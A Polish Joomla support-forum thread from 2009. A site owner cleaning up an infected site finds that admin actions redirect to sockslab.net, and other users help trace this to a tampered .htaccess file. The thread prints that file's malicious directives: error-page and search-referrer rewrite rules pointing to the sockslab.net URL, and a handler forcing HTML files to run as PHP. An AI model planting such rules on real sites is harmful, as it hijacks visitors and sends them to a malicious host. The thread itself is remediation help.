Był wirus na serwerze (?) - Przenosi na sockslab.net z panelu admina

**siristru** · 05-09-2009, 15:24

Mam następujący kłopot:

Koledzy poprosili nie o pomoc. Ich strona padła po ataku wirusa ( strona jest na serwerze http://www.webd.pl/).
Wyczyściłem katalog w którym przechowywali Joomlę, zrobiłem kopię bazy danych. Zainstalowałem nową Joomlę i przywróciłem bazę danych.

Strona od frontu stanęła. Problem pojawia się kiedy w panelu administracyjnym próbuję zatwierdzić jakieś działanie. Każde kliknięcie zapisz, zastosuj czy nauluj powoduje przeniesienie na stronę:

sockslab . net/in.cgi?7&parameter=sockslab

FF mi zgłasza, że ta strona jest zagrożeniem - dlatego nie wchodziłem na to g***o.

Czy ktoś może mi poradzić jak sobie z tym poradzić?

**moje** · 05-09-2009, 15:33

A pliki Joomla zostały nadpisane?

**siristru** · 05-09-2009, 15:42

Nie nadpisywałem ich - były z Joomla! 1.5.10. Wykasowałem je do czysta i wypakowałem świeżutką paczkę z Joomla 1.5.14. Tylko wpisy w bazie danych są ze starej strony. Ale szukałem w niej zapisów "sockslab" i jest czysto.

**KYCu** · 05-09-2009, 16:10

Może masz jeszcze ukryty plik .htaccess w głównym folderze serwera? usuń go lub nadpisz tym z Joomla!
Piszę, bo nie napisałeś nawet czy problem nadal występuje.

**moje** · 05-09-2009, 16:15

I nie podałeś linka.

**siristru** · 06-09-2009, 12:45

@KYCu

Faktycznie w pliku .htaccess jest coś takiego:

Kod PHP:


ErrorDocument 400 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 401 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 403 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 404 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 500 http://sockslab.net/in.cgi?8&parameter=sockslab
AddType application/x-httpd-php .php .htm .html .phtml


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7&parameter=sockslab [R=301,L]

Wywalić wszystkie wpisy z sockslab? czy zastąpić je czymś?
Ten plik znajduje się w katalogu public_html, który zawiera katalog gdzie trzymam Joomlę.

@moje:

Nie podałem odnośnika bo problem występuje jedynie na zapleczu.

**moje** · 06-09-2009, 12:51

Zastąp cały plik, tym standardowym z Joomla.

**siristru** · 06-09-2009, 12:58

Takie pliki są w sumie trzy:

- jeden w katalogu głównym public_html (z wirusem)
- jeden w katalogu forum PHPBB2 by Przemo (z wirusem)
- i ten nowy z Joomli

Czy tym joomlowym zastąpić oba?

**KYCu** · 06-09-2009, 13:04

w public_html powinieneś mieć właśnie jeden plik .htaccess z joomla, bez rozszerzenia .txt

**moje** · 06-09-2009, 13:05

Ten z phpBB zamień na standardowy z phpBB, o ile takowy jest, jak nie ma, to usuń ten z wirusem.

Temat: Był wirus na serwerze (?) - Przenosi na sockslab.net z panelu admina

Przybornik

Widok

Był wirus na serwerze (?) - Przenosi na sockslab.net z panelu admina

Reguły pisania